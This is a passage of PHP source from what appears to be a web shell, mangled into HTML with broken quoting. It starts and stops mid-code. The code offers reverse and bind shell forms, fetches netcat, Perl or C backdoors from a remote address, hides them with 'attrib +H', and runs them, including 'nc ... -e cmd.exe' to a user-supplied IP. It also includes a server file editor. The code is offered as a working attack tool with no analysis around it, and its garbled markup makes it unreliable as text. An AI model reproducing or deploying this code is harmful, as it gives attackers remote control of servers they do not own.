($_REQUEST['rport']>=1) && !empty($_REQUEST['ip'])){ $ip=$_REQUEST['ip']; $port=(int)$_REQUEST['rport']; if($windows){ if($c){ $name.='.exe'; $bd=downloadiT("$addr/nc",$name); shelL("attrib +H $name"); if(!$bd)echo $error;else shelL("$name $ip $port -e cmd.exe"); }else{ $name=$name.'.pl'; $bd=downloadiT("$addr/winrc.p",$name); shelL("attrib +H $name"); if (!$bd)echo $error;else shelL("perl.exe $name $ip $port"); } } else{ if($c){ $bd=downloadiT("$addr/rc.c",$name); if(!$bd)echo $error;else shelL("cd $d;gcc -o $n $n.c;chmod +x ./$n;./$n $ip $port &"); }else{ $bd=downloadiT("$addr/rc.p",$name); if(!$bd)echo $error;else shelL("cd $d;perl $n $ip $port &"); } } echo '<span style="color: blue;">Done!</span>';} else{echo " <table style="border-collapse: collapse; width: 100%;" border="0"> <tbody> <tr> <td> <table style="border-collapse: collapse; width: 50%;" border="0"> <tbody> <tr> <td width="50%" bgcolor="#333333">Bind shell:</td> <td bgcolor="#333333"> </td> </tr> <form method="POST"></form> <tr> <td width="20%" bgcolor="#666666">Port:</td> <td bgcolor="#666666"><input name="port" size="5" type="text" value="55501" /></td> </tr> <tr> <td width="20%" bgcolor="#808080">Type:</td> <td bgcolor="#808080"><input style="border-width: 1px; background-color: #808080;" name="C" type="radio" value="0" />PERL<input style="border-width: 1px; background-color: #808080;" name="C" type="radio" value="1" />";if($windows)echo 'EXE';else echo 'C';echo"</td> </tr> <tr> <td width="20%" bgcolor="#666666"> </td> <td align="right" bgcolor="#666666">$hcwd<input class="buttons" type="submit" value="Bind" />$et</td> <td> <table style="border-collapse: collapse; width: 50%;" border="0"> <tbody> <tr> <td width="40%" bgcolor="#333333">Reverse shell:</td> <td bgcolor="#333333"> </td> </tr> <form method="POST"></form> <tr> <td width="20%" bgcolor="#808080">IP:</td> <td bgcolor="#808080"><input name="ip" size="17" type="text" value=";echo $_SERVER['REMOTE_ADDR'];echo " /></td> </tr> <tr> <td width="20%" bgcolor="#666666">Port:</td> <td bgcolor="#666666"><input name="rport" size="5" type="text" value="53" /></td> </tr> <tr> <td width="20%" bgcolor="#808080">Type:</td> <td bgcolor="#808080"><input style="border-width: 1px; background-color: #808080;" name="C" type="radio" value="0" />PERL<input style="border-width: 1px; background-color: #808080;" name="C" type="radio" value="1" />";if($windows)echo 'EXE';else echo 'C';echo"</td> </tr> <tr> <td width="20%" bgcolor="#666666"> </td> <td align="right" bgcolor="#666666">$hcwd<input class="buttons" type="submit" value="Connect" />$et$et";}} function showimagE($img){ echo "<img src="".hlinK("imagE=$img&&workingdiR=".getcwd())."" border="0" alt="" />";} function editoR($file){ global $errorbox,$et,$hcwd,$cwd; if(is_file($file)){ if(!is_readable($file)){echo "$errorbox File is not readable$et<br />";} if(!is_writeable($file)){echo "$errorbox File is not writeable$et<br />";} $data=file_get_contents($file); echo " <table style="border-collapse: collapse; width: 40%;" border="0"> <tbody> <tr> <td width="10%" bgcolor="#808080"><form method="POST">$hcwd<input name="file" size="75" type="text" value="".htmlspecialchars($file)."" /><input class="buttons" name="Open" type="submit" value="Open" /></form>$et<br /> <table style="border-collapse: collapse; width: 40%;" border="0"> <tbody> <tr> <td width="40%" bgcolor="#666666"><form method="POST"><textarea cols="64" rows="18" name="edited">"; echo htmlspecialchars($data); echo "